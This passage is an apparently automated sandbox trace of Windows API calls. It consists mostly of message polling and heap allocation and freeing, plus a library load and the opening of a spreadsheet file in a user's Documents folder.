wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.642] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.642] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.642] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.642] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.642] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.642] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.642] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.642] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.642] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.642] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.642] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.642] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.643] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.643] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.643] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0170.643] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0170.644] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\g_g2urcnwKcCd17PjNc.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\g_g2urcnwkccd17pjnc.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0170.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0170.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0170.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0170.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0170.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0170.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0170.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0170.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0170.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0170.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0170.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0170.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0170.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0170.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0170.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0170.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8edfa0 [0170.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0170.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0170.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0170.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0170.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0170.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0170.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0170.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0170.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0170.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0170.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0170.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0170.646] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0170.646] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0170.646] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0170.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0170.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0170.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0170.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0170.646] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0170.646] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0170.646] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0170.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0170.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0170.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0170.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0170.646] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0170.646] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0170.646] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0170.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0170.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0170.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0170.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0170.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0170.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0170.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0170.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0170.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0170.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0170.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0170.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0170.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0170.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0170.647] FreeLibrary (hLibModule=0x75990000) returned 1 [0170.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0170.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0170.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0170.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0170.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0170.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0170.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0170.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0170.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0170.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0170.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0170.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0170.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0170.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0170.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0170.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0170.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0170.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0170.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0170.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0170.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0170.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0170.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0170.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0170.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0170.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0170.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0170.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0170.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0170.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0170.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0170.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0170.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0170.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0170.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0170.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0170.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0170.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0170.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0170.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0170.649] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0170.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0170.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0170.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0170.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0170.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0170.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0170.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0170.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0170.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0170.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0170.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d460 [0170.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0170.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0170.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0170.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0170.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0170.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0170.650] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0170.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0170.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0170.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0170.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0170.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0170.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0170.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0170.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0170.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0170.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0170.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0170.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0170.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0170.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0170.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0170.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0170.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0170.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0170.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0170.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0170.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0170.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0170.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0170.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0170.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0170.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0170.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0170.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0170.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0170.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0170.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0170.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0170.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0170.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0170.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0170.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0170.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0170.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0170.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0170.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0170.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0170.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0170.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0170.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0170.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0170.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0170.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0170.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0170.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0170.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0170.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0170.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0170.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0170.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0170.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0170.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0170.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0170.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0170.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0170.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0170.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0170.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0170.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0170.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0170.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0170.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0170.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0170.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0170.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0170.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0170.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0170.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0170.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0170.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0170.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0170.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0170.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0170.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0170.653] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, 